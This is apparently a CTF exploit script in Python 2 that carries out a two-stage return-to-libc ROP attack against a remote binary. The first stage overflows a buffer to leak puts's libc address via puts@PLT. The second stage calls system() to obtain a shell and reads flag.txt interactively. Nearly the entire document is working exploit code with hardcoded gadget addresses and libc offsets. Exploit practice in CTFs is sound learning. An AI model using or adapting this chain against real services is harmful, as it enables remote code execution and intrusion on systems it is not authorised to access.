Return-to-libc with ROP through puts (CTF exploit script)
#!/usr/bin/env python2
# Return-to-libc in two stages: leak puts's libc address by calling puts@PLT on puts@GOT
# and returning to main, then overflow again to call libc's system().
import socket
import struct
import sys
import telnetlib
# Target endpoint. Both values are placeholders and must be filled in before use.
host = "host"
port = "port"
# Open the TCP connection and wrap it in an unbuffered read/write file object so
# every write is sent immediately and reads are not held back in a buffer.
target = (host, port)
s = socket.create_connection(target)
f = s.makefile('rw', bufsize=0)
def communicate(s):
    """Hand an already-connected socket to telnetlib for an interactive session.

    Args:
        s: connected socket. It is attached directly to a Telnet object, so
           no second connection is made.
    """
    # NOTE(review): telnetlib is deprecated (PEP 594); fine for the python2
    # interpreter this script targets.
    session = telnetlib.Telnet()
    session.sock = s
    session.interact()
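# get end of program output
def read_end(f, delimit):
    """Read from f one character at a time until the data read ends with delimit.

    The stream has no lookahead, so reads are deliberately one character wide
    to avoid consuming bytes that belong to the next message (the leak).

    Args:
        f: file-like object supporting read(1).
        delimit: terminator to stop at; an empty terminator returns '' at once.
    Returns:
        Everything read, including the terminator.
    Raises:
        EOFError: the stream ended before the terminator appeared. The previous
            version spun forever here, because read(1) keeps returning '' at EOF.
    """
    if not delimit:
        return ''
    parts = []
    tail = ''
    width = len(delimit)
    while True:
        ch = f.read(1)
        if not ch:
            raise EOFError("stream closed before delimiter %r was seen" % (delimit,))
        parts.append(ch)
        # only the last len(delimit) characters can match; keep the check O(1)
        tail = (tail + ch)[-width:]
        if tail == delimit:
            return ''.join(parts)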
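# payload to leak PUTS, returns to MAIN
def leak(buf_len=0x40 + 8, pop_rdi=0x4006d3, puts_got=0x601018,
         puts_plt=0x4004e0, main_addr=0x400626):
    """Build the first-stage ROP chain that makes the target print puts's libc address.

    Chain: pad the overflowed buffer up to the saved return address, then
    `pop rdi; ret` with puts@GOT as the argument, call puts@PLT (which writes the
    resolved libc address of puts to stdout) and return into main so the program
    can be overflowed a second time.

    Args:
        buf_len: bytes from the start of the buffer to the saved RIP
            (0x40 plus 8 — presumably the saved RBP — for this target).
        pop_rdi: address of a `pop rdi; ret` gadget in the binary.
        puts_got: address of puts's GOT entry.
        puts_plt: address of puts's PLT stub.
        main_addr: address to return to after the leak.
    Returns:
        The payload as bytes (a str on Python 2), without a trailing newline.
    """
    chain = (pop_rdi, puts_got, puts_plt, main_addr)
    # addresses are unsigned 64-bit little-endian words
    return b"\x41" * buf_len + b"".join(struct.pack("<Q", addr) for addr in chain)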
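# First stage: consume the program's output up to its first newline, then send
# the leak chain followed by the newline that terminates the vulnerable read.
read_end(f, chr(0x0a))
f.write(leak() + chr(0x0a))

# puts stops at the first NUL byte, and a canonical x86-64 user-space address has
# two zero high bytes, so the leak is 6 bytes; pad to 8 before unpacking.
raw = f.read(6)
if len(raw) != 6:
    raise EOFError("expected a 6-byte address leak, got %r" % (raw,))
libc_puts = struct.unpack("<Q", raw.ljust(8, "\x00"))[0]

# NOTE(review): these offsets belong to one specific libc build; re-derive them
# (readelf -s / strings -t x) for the target's libc or every address below is wrong.
libc_base = libc_puts - 0x6f690       # offset of puts inside libc
libc_system = libc_base + 0x45390     # offset of system inside libc
shell = libc_base + 0x18cd57          # offset of the "/bin/sh" string inside libc

# libc is mapped page-aligned, so a misaligned base means the leak was garbage
# (e.g. the program did not return to main) or the puts offset is for another libc.
if libc_base & 0xfff:
    raise ValueError("libc base {} is not page-aligned; bad leak or wrong offsets".format(hex(libc_base)))

# print locations
print("LIBC_PUTS: {}".format(hex(libc_puts)))
print("LIBC_BASE: {}".format(hex(libc_base)))
print("LIBC_SYSTEM: {}".format(hex(libc_system)))
print("SHELL: {}".format(hex(shell)))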
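# shell exploit
def exploit(cmd_addr=0x000000000040038f, system_addr=None,
            buf_len=0x40 + 8, pop_rdi=0x4006d3):
    """Build the second-stage ROP chain that calls system() with a command string.

    Args:
        cmd_addr: address of the NUL-terminated command string placed in RDI.
            The default 0x40038f lies inside the binary's own image (its old
            "LIBC_PUTS" label was wrong); the libc "/bin/sh" address computed
            into `shell` by the leak stage is the usual alternative to pass here.
        system_addr: address of libc's system(); when None, the module-level
            libc_system computed from the leak is used.
        buf_len: bytes from the start of the buffer to the saved RIP.
        pop_rdi: address of a `pop rdi; ret` gadget in the binary.
    Returns:
        The payload as bytes (a str on Python 2), without a trailing newline.

    NOTE(review): if system() crashes on a movaps instruction, the stack is not
    16-byte aligned at the call; insert a lone `ret` gadget before system_addr.
    """
    if system_addr is None:
        system_addr = libc_system  # global produced by the leak stage
    chain = (pop_rdi, cmd_addr, system_addr)
    # addresses are unsigned 64-bit little-endian words
    return b"\x41" * buf_len + b"".join(struct.pack("<Q", addr) for addr in chain)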
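# Second stage: send the system() chain, then queue the command that reads the
# flag so it runs as soon as the shell comes up, and hand the session to the user.
try:
    f.write(exploit() + chr(0x0a))
    f.write("cat flag.txt" + chr(0x0a))
    communicate(s)
except KeyboardInterrupt:
    print("\n")
    sys.exit()
finally:
    # release the connection whether the session ended normally or was interrupted
    f.close()
    s.close()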